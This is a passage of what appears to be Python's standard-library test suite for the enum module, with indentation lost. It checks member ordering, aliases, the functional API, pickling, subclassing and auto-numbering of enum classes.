class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
